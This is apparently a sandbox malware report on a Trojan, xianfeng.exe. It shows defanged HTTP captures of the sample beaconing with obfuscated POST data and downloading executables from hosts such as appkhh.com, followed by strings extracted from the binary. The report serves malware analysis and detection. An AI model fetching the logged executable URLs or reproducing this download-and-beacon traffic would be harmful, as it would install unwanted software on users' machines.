Accept-Ranges: bytes
/**..* @preserve HTML5 Shiv 3.7.2 | @afarkas @jdalton @jon_neal @rem |
 MIT/GPL2 Licensed..*/..!function(a,b){function c(a,b){var c=a.createE
lement("p"),d=a.getElementsByTagName("head")[0]||a.documentElement;ret
urn c.innerHTML="x<style>" b "</style>",d.insertBefore(c.l
astChild,d.firstChild)}function d(){var a=t.elements;return"string"==t
ypeof a?a.split(" "):a}function e(a,b){var c=t.elements;"string"!=type
of c&&(c=c.join(" ")),"string"!=typeof a&&(a=a.join(" ")),t.elements=c
 " " a,j(b)}function f(a){var b=s[a[q]];return b||(b={},r  ,a[q]=r,s[r
]=b),b}function g(a,c,d){if(c||(c=b),l)return c.createElement(a);d||(d
=f(c));var e;return e=d.cache[a]?d.cache[a].cloneNode():p.test(a)?(d.c
ache[a]=d.createElem(a)).cloneNode():d.createElem(a),!e.canHaveChildre
n||o.test(a)||e.tagUrn?e:d.frag.appendChild(e)}function h(a,c){if(a||(
a=b),l)return a.createDocumentFragment();c=c||f(a);for(var e=c.frag.cl
oneNode(),g=0,h=d(),i=h.length;i>g;g  )e.createElement(h[g]);return
 e}function i(a,b){b.cache||(b.cache={},b.createElem=a.createElement,b
.createFrag=a.createDocumentFragment,b.frag=b.createFrag()),a.createEl
ement=function(c){return t.shivMethods?g(c,a,b):b.createElem(c)},a.cre
ateDocumentFragment=Function("h,f","return function(){var n=f.cloneNod
e(),c=n.createElement;h.shivMethods&&(" d().join().replace(/[\w\-:] /g
,function(a){return b.createElem(a),b.frag.createElement(a),'c("' a '"
)'}) ");return n}")(t,b.frag)}function j(a){a||(a=b);var d=f(a);return
!t.shivCSS||k||d.hasCSS||(d.hasCSS=!!c(a,"article,aside,dialog,fig
<<< skipped >>>

GET /Public/bootstrap/3.3.5/fonts/glyphicons-halflings-regular.eot? HTTP/1.1


Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:52 GMT
Content-Type: application/vnd.ms-fontobject
Content-Length: 20127
Last-Modified: Tue, 16 Jun 2015 01:13:22 GMT
Connection: keep-alive
ETag: "557f7832-4e9f"
Accept-Ranges: bytes
.N..AM............................LP........................'..,......
............(.G.L.Y.P.H.I.C.O.N.S. .H.a.l.f.l.i.n.g.s.....R.e.g.u.l.a.
r...x.V.e.r.s.i.o.n. .1...0.0.9.;.P.S. .0.0.1...0.0.9.;.h.o.t.c.o.n.v.
 .1...0...7.0.;.m.a.k.e.o.t.f...l.i.b.2...5...5.8.3.2.9...8.G.L.Y.P.H.
I.C.O.N.S. .H.a.l.f.l.i.n.g.s. .R.e.g.u.l.a.r.....BSGP................
.....M..M..F..........(u...<.0D.B/X..N....CC.^...rmR2sk..PJ"5 .gl.W
*i.W./E.....4#...U.~.f....UD........J.1./!../...s..7...k.....(...h.N..
[email protected]".Fj....6C3..&......W51.....B..a..QaR.U/
..{*[email protected]$..1.T..nc [email protected]>.K....m.' 
....C.HM..fB.X.,.Y....p.e......U....*...z..m...i..O1nE.......hx!aC.XT.
.V...........R....%...|I..H....P.5".b.N....=...r./_.R...._..%...uz....
.5.2.....P.)........F.7S..q.F.{[email protected].;...}9....?.........R{.T
k.;.....U\N.Z..Q-.^.s..7.f.0....S3A..._n..`W.7P..p.....i...!.g./._p...
.Z.-=...~WZ#/.4 KF.`. ...z...0..|.D.........&d..I.......;.M..{'.om..m.
.I...!w.i9|H:..........{..~...q....O.........,. .L]&.J0...9/...9&.Y...
..{;..'.3`[email protected]$...3....Dx28....W. Cx5x..w..B`.$C$'..El..y..
h.......DJ.$(p.....QA.A..A.@'.$.h.p..0.V.0 `..s..e.$.4$"t2=f..4.A.{Tk.
.0|r.H........`.L&..s.h.]...A<.....`R.'...!...1N..;.._.t3.#. ......
.V....*ve.F`E. O$.{).W=p:....F`..2...2..C....^............G..<<?
....~z.........>..p..Ne2....... Y.s..l:.........u5.....t.u.^8..6...
...Tmy.Q.%..u~...%~1r..a.w..^.._.Z..Z.a...0!.......N.`....uq....YB.\..
..............[.e.....:@..J'E...,[email protected](.
<<< skipped >>>

GET /Public/images/sns_qq.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:53 GMT
Content-Type: image/png
Content-Length: 1851
Last-Modified: Tue, 19 May 2015 04:17:19 GMT
Connection: keep-alive
ETag: "555ab94f-73b"
Expires: Mon, 07 Dec 2015 04:59:53 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR.............h.......tEXtSoftware.Adobe ImageReadyq.e&
lt;... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS5 Windows" xmpMM:InstanceID="xmp.iid:38F721A94AC711E09F31828F56
93D33B" xmpMM:DocumentID="xmp.did:38F721AA4AC711E09F31828F5693D33B">
; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:38F721A74AC711E09F31
828F5693D33B" stRef:documentID="xmp.did:38F721A84AC711E09F31828F5693D3
3B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> 
<?xpacket end="r"?>_O1.....IDATx.b`..%E..L..z.wU.1........H.....
.My............}C... ...|.............X.....Yy..0GEQ...\I^.?...m...XK.
...g../...6wY.......)qY....k..W........@..... 9..1_...'.v20..a`......;
....}.....jJ.. 2..?5W.................Z..eT.3.L..'.......k.2..}...^.py
?..u..F..b...[...*...........0..=..=..?33....(.......x......`D.T108...
.......5,..v.._$&..:.C...Fcc.....e.5.g..z...w...23D.K2\.r......>{..
I....?~............R..s.......V.d`ccc............%........?.1.9...... 
...A^..a..{P....P&..2..Q.....VoC\.....^.$..#.1H*.Fbhm].....,.!...&".H.
.... ...GDiz.n....m...-.....w...........e#`.O..x(...C.R *.......)=
<<< skipped >>>

GET /Public/jquery/1.11.3/jquery.min.js?1.0.247 HTTP/1.1


Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:55 GMT
Content-Type: application/javascript
Content-Length: 95992
Last-Modified: Wed, 19 Aug 2015 17:28:41 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "55d4bcc9-176f8"
Expires: Sat, 07 Nov 2015 16:59:55 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.o
rg/license */.!function(a,b){"object"==typeof module&&"object"==typeof
 module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.do
cument)throw new Error("jQuery requires a window with a document");ret
urn b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){v
ar c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=
h.hasOwnProperty,k={},l="1.11.3",m=function(a,b){return new m.fn.init(
a,b)},n=/^[\s\uFEFF\xA0] |[\s\uFEFF\xA0] $/g,o=/^-ms-/,p=/-([\da-z])/g
i,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,c
onstructor:m,selector:"",length:0,toArray:function(){return d.call(thi
s)},get:function(a){return null!=a?0>a?this[a this.length]:this[a]:
d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a
);return b.prevObject=this,b.context=this.context,b},each:function(a,b
){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map
(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return t
his.pushStack(d.apply(this,arguments))},first:function(){return this.e
q(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.le
ngth,c= a (0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]
:[])},end:function(){return this.prevObject||this.constructor(null)},p
ush:f,sort:c.sort,splice:c.splice},m.extend=m.fn.extend=function(){var
 a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boole
an"==typeof g&&(j=g,g=arguments[h]||{},h  ),"object"==typeof g||m.
<<< skipped >>>

GET /View/Home/Task//base.js?1.0.247 HTTP/1.1


Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: application/javascript
Content-Length: 17513
Last-Modified: Mon, 19 Oct 2015 06:32:55 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "56248e97-4469"
Expires: Sat, 07 Nov 2015 16:59:59 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/* @name daicuo.cc base.js..** @lasttime 2015-10-19..** @email 2715138
[email protected]..** dc.scroll.page() .............................** dc.scro
ll.fixed($id,$top,$width) ..............** dc.scroll.totop($id,$top) .
....................... ...CSS.......$id..** dc.click.nextpage(); ....
........(.........)..** dc.click.share(); .dc-share...................
.** dc.click.collect(); .dc-collect....................** dc.click.dow
n(); .dc-down....................** dc.click.up(); .dc-up.............
.......** dc.click.hits(); .dc-tj..........................** dc.key.d
own(); ..............** dc.user.islogin() .................. .dc-islog
in..** dc.user.login() .................** dc.user.score() ...........
............. dc-user-score..** dc.task.bind() ............ #dc-task..
** dc.load.cms(); ajax..............** dc.load.images(); .............
.......** dc.load.union($second); ..............** dc.load.hits($id); 
....................** dc.cookie.set(name, value, days)..** dc.cookie.
get(name)..** dc.cookie.del(name)..*/..dc.scroll = {...'page' : functi
on(){....// ............... $(this).unbind("scroll");....$(window).bin
d('scroll', function(){.....var nexturl = $("#dc-nextpage").attr('data
-href');.....if(nexturl == undefined){......return false;.....}.....va
r c = $(window).height();.....var t = $(document).scrollTop();  .....v
ar h = $(document).height();.....if( h - t - c == 0 ){......$.get(next
url (dc.page*1 1), function(data){.......if(data){........// .........
..............$("#dc-item").append(data);........// ..............
<<< skipped >>>


GET /CSC3-2010.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2010-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "7c8bb8b999f19239c68f0bca1cf9491c:1446844256"
Last-Modified: Fri, 06 Nov 2015 21:10:56 GMT
Date: Sat, 07 Nov 2015 05:00:11 GMT
Transfer-Encoding:  chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl
00006000..0..D.0..C....0...*.H........0..1.0...U....US1.0...U....VeriS
ign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at h
ttps://VVV.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Sign
ing 2010 [email protected]
0730092631Z0!....c..k....D.k.....120708062201Z0!... _...u.t.=.<.&..
.130218061114Z0!...&..].....P.k.:...120125130117Z0!...7P.x....8.Q...s.
.130227010252Z0!...J.....Q..Y.[.....110404153956Z0!...d...=..q!_...g9.
.130729145216Z0!...d....Y.......o...140711083257Z0!...l.....h2<.H..
....120329152211Z0!...q.9...`H.*.Y.C...120525202212Z0!...s...TM.......
0...121221080842Z0!...t..,.. ...eL.....130314222305Z0!...y..r.HW.v....
.w..140423054643Z0!..../u.......A..5...101214165045Z0!.....0.Xc...%...
iM..121102230226Z0!.......S.a&.X5t.E]..111206083350Z0!....c.(....B.[M8
3...140108164517Z0!....A.Sv.....f,.....110609003155Z0!.....z......!.ID
{]..101228182208Z0!....b^......{d.J'...130102154110Z0!.......n........
'u..140521222808Z0!......0..........I..130912181631Z0!.....1.;C,.. L..
0...141111073655Z0!....6e...~..T.......130131012247Z0!.....|.....t.l.o
....140827175301Z0!.........bD#*u......130226223939Z0!.......@..'$.).;
}\..130121172259Z0!....7.v..........n..120724160733Z0!....n[..P..a.y..
.p..141121045513Z0!....P;.Y..d...c.(...120209181451Z0!.....].bb[.....!
....140328205453Z0!.....a...L`..IV.....130402103508Z0!......fFW.z.....
@T..130117000242Z0!...........].{7.....120730000000Z0!...".......Z.V.,
.e..121031192224Z0!...'....[.1......g..130318195659Z0!...,GI.jH.|.
<<< skipped >>>


POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive

.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00067820760341062666110713
Server: Apache
tracecode: 00067820760341062666110713
Set-Cookie: BAIDUID=FD9EDA96E9FFC3CC3B14288B214300D1:FG=1; expires=Sun, 06-Nov-16 05:00:06 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



GET /dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe?mkey=563da395da60d437&f=2384&p=.exe HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
Host: 103.7.29.215


HTTP/1.1 200 OK
Server: CDN_NWS_4.2.1
Connection: keep-alive
Date: Sat, 07 Nov 2015 05:00:16 GMT
Cache-Control: max-age=600, s-maxage=60
Expires: Sat, 07 Nov 2015 05:10:16 GMT
Last-Modified: Fri, 08 May 2015 02:43:07 GMT
Content-Type: application/octet-stream
Content-Length: 47240016
X-Cache-Lookup: Hit From Disktank
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......)1..mP.KmP.K
mP.K...KoP.KJ..KrP.KJ..K.P.KJ..K1P.K._.KhP.K._.KpP.KmP.K.Q.KJ..K.P.KJ.
.KlP.KJ..KlP.KRichmP.K................PE..L.....#..................p..
.@....................@...........................$......d............
.......................................[..............`...............
[email protected].......@.............
.......text...Yb.......p.................. ..`.rdata...{..............
............@[email protected]............`[email protected]....[....
...`...`..............@..@............................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 120
Connection: Keep-Alive

.#4H.......L..BH............................--./01ZG@E..]ULRQQ^$o16<,'=) d(# a)?#
7;"8xjikhs40,....UV_T\Q_E...opqrstuvw
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991270750315632138110712
Server: Apache
tracecode: 35991270750315632138110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B9146A82791018378:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



GET /mmliao/MM-liao8863.exe HTTP/1.1
Host: mm.appkhh.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive


HTTP/1.1 302 Found
Date: Sat, 07 Nov 2015 05:00:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: hXXp://down.appkhh.com:9000/mmliaonew/MM-liao8863.exe
Set-Cookie: ASP.NET_SessionId=unvtmf55i2o5pj550p3epgra; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 808
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXp://down.
appkhh.com:9000/mmliaonew/MM-liao8863.exe">here</a>.</h2&g
t;..</body></html>....<!DOCTYPE html PUBLIC "-//W3C//DT
D XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-
transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" &
gt;..<head><title>.................</title></head
>..<body>..    <form name="form1" method="post" action="..
/download/SubConfig.aspx?id1=8863" id="form1">..<div>..<in
put type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJN
zgzNDMwNTMzZGQiFbVbBJv7A/lcSr1Og9mkU0lctw==" />..</div>..<
div>...<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VI
EWSTATEGENERATOR" value="9F81D7CC" />..</div>..    <div>
;..    ..    </div>..    </form>..</body>..</html
>....



GET /v1/t/full/p/mini/tn/10003408/ch_dl_url.exe HTTP/1.1
Host: j.br.baidu.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive


HTTP/1.1 301 Moved Permanently
Server: nginx/1.4.1
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.22
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://dlsw.br.baidu.com/package/201511/7c9ddd8b4b286eef807bc97513948574.exe
0..



POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive

.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00033015391911494410110713
Server: Apache
tracecode: 00033015391911494410110713
Set-Cookie: BAIDUID=37CF03EF72C69E44C1FECBC156BA5EE4:FG=1; expires=Sun, 06-Nov-16 05:00:03 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /commit?cmd=finfo HTTP/1.1
Content-Length: 700
Connection: Keep-Alive

.#4H..........T.........................................a..................................................................................S8.....[3..
Z*.............V. [email protected][X.^VOY.D[MO%$&l546$%.8d("9!<>37{.....5,211>.VSZRUH..jklmnopqrstuvwxyz{|}~......M.....y.......8..w..u.....lB...<Sr..{...?.....9gO..
.....6V.......0.h<..u.g....."O...R...M]..t42.5.'...'a...W .ST.E...`t.;.....\. ....`.,w...09.\.
_...N...a6..T..Y".......{......{f...h
....<)..8....
m.];>`......l..$S.~..N.fZ.{]......9r.....!...\....S.p...1{~T....V.`...h..p.mGSOJ.^q.t........:......2......]6v..*.... ..a...&....^....r:........~{4.6.:..~.({...o...5(...)7=.7(..I....R.ui.....g/.o..
.p...q.s.."#$%&'()..:-./01
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00128049050818948618110713
Server: Apache
tracecode: 00128049050818948618110713
Set-Cookie: BAIDUID=2B26F61FAC88F8F0813C71ECDC5124A9:FG=1; expires=Sun, 06-Nov-16 05:00:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive

.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00072362801213477898110713
Server: Apache
tracecode: 00072362801213477898110713
Set-Cookie: BAIDUID=A9AAE706CAC814E2200D085686071519:FG=1; expires=Sun, 06-Nov-16 05:00:07 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /commit?cmd=finfo HTTP/1.1
Content-Length: 700
Connection: Keep-Alive

.#4H..........T.........................................a..................................................................................S8.....[3..
Z*.............V. [email protected][X.^VOY.D[MO%$&l546$%.8d("9!<>37{.....5,211>.VSZRUH..jklmnopqrstuvwxyz{|}~......M.....y.......8..w..u.....lB...<Sr..{...?.....9gO..
.....6V.......0.h<..u.g....."O...R...M]..t42.5.'...'a...W .ST.E...`t.;.....\. ....`.,w...09.\.
_...N...a6..T..Y".......{......{f...h
....<)..8....
m.];>`......l..$S.~..N.fZ.{]......9r.....!...\....S.p...1{~T....V.`...h..p.mGSOJ.^q.t........:......2......]6v..*.... ..a...&....^....r:........~{4.6.:..~.({...o...5(...)7=.7(..I....R.ui.....g/.o..
.p...q.s.."#$%&'()..:-./01
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00119517720658453514110713
Server: Apache
tracecode: 00119517720658453514110713
Set-Cookie: BAIDUID=2C7B1E2C3C0DA05794EB27122BF6134F:FG=1; expires=Sun, 06-Nov-16 05:00:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /commit?cmd=finfo HTTP/1.1
Content-Length: 543
Connection: Keep-Alive

.#4H........................................!#$%&"k." ,-.
3234!~
:9:;[email protected]_.b[Z[\U.ebabcK/\ehijc'Wlopqv?Nwvwx}4A~}~......................................................................................................... .........?.m...
..........&'...l..j..._...........5..Pe%......Z..6.......Y...B....4....q...{.k..Q,7.c=(.`^.{...0.r*..&=.z&
,...^.......f....!.......z....c..wg...N...{aP. ...7..KZ.?..j.....R.|...:..........Qb_...~l .0.s...o..xf.d.=9...I....E(.y....d."[email protected].;^}..Y....
.M.......
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00145449851213477898110713
Server: Apache
tracecode: 00145449851213477898110713
Set-Cookie: BAIDUID=E927C7BA6E0D653E6B7119B2F952D9BD:FG=1; expires=Sun, 06-Nov-16 05:00:14 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /commit?cmd=finfo HTTP/1.1
Content-Length: 543
Connection: Keep-Alive

.#4H........................................!#$%&"k." ,-.
3234!~
:9:;[email protected]_.b[Z[\U.ebabcK/\ehijc'Wlopqv?Nwvwx}4A~}~......................................................................................................... .........?.m...
..........&'...l..j..._...........5..Pe%......Z..6.......Y...B....4....q...{.k..Q,7.c=(.`^.{...0.r*..&=.z&
,...^.......f....!.......z....c..wg...N...{aP. ...7..KZ.?..j.....R.|...:..........Qb_...~l .0.s...o..xf.d.=9...I....E(.y....d."[email protected].;^}..Y....
.M.......
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00129075050581376522110713
Server: Apache
tracecode: 00129075050581376522110713
Set-Cookie: BAIDUID=2B26F61FAC88F8F0FC4D9B271683B1BE:FG=1; expires=Sun, 06-Nov-16 05:00:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive

.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00017557620315632138110713
Server: Apache
tracecode: 00017557620315632138110713
Set-Cookie: BAIDUID=69DAC83DF6D595A3324C44730134BB38:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..

The Trojan connects to the servers at the folowing location(s):

xianfeng.exe_272:

.text
`.rdata
@.data
.ndata
.rsrc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
pG.lH
d&.iH
(1v%f M*
.na;T
%SCCg
HJ.Wr
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\modern-wizard.bmp
OCALS~1\Temp\nsf4.tmp\System.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\modern-wizard.bmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\ioSpecial.ini
ttp://VVV.xfplay.com
8.9.0 P2P
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp
nsf4.tmp
